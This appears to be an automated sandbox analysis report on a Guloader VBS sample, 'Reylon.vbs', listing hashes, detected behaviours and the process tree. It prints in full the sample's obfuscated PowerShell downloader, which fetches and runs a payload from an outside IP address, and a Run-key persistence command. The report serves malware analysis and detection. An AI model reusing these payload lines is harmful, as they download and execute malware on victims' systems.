Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
12/07/2023, 09:23
Static task
static1
Behavioral task
behavioral1
Sample
Reylon.vbs
Resource
win7-20230705-en
Behavioral task
behavioral2
Sample
Reylon.vbs
Resource
win10v2004-20230703-en
General
-
Target
Reylon.vbs
-
Size
16KB
-
MD5
5fcc423dd95776e7ce18ea1804b27118
-
SHA1
85bbd202a7a2919cb4733c564dfd7c3ae2319510
-
SHA256
82b08d87211f44c871d681e216fcd8ae33f485af2f6737011f187c5a56ac8c56
-
SHA512
63c9f5e642da7de4d6aab845e3f9940bf23b13fd75be8cd55b4639a688a840b01ec2b7e7c42eba22347ab5061d1a5a0ba55bb528ac779d9e7820e324af83483f
-
SSDEEP
384:cEYCB7v5QM+PUiStGvDQzX4FG0NClMgW8Q2T:c5CDkLKbW8zT
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 1740 WScript.exe -
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ieinstal.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Software\Microsoft\Windows\CurrentVersion\Run ieinstal.exe Set value (str) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kalibr = "%Della% -w 1 $Exostrad=(Get-ItemProperty -Path 'HKCU:\\Outglari\\').Part;%Della% ($Exostrad)" ieinstal.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 3368 ieinstal.exe 3368 ieinstal.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1580 powershell.exe 3368 ieinstal.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1580 set thread context of 3368 1580 powershell.exe 107 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 3396 powershell.exe 3396 powershell.exe 1580 powershell.exe 1580 powershell.exe 1580 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1580 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3396 powershell.exe Token: SeDebugPrivilege 1580 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3368 ieinstal.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1740 wrote to memory of 3396 1740 WScript.exe 99 PID 1740 wrote to memory of 3396 1740 WScript.exe 99 PID 3396 wrote to memory of 1580 3396 powershell.exe 101 PID 3396 wrote to memory of 1580 3396 powershell.exe 101 PID 3396 wrote to memory of 1580 3396 powershell.exe 101 PID 1580 wrote to memory of 3368 1580 powershell.exe 107 PID 1580 wrote to memory of 3368 1580 powershell.exe 107 PID 1580 wrote to memory of 3368 1580 powershell.exe 107 PID 1580 wrote to memory of 3368 1580 powershell.exe 107
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reylon.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3368
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82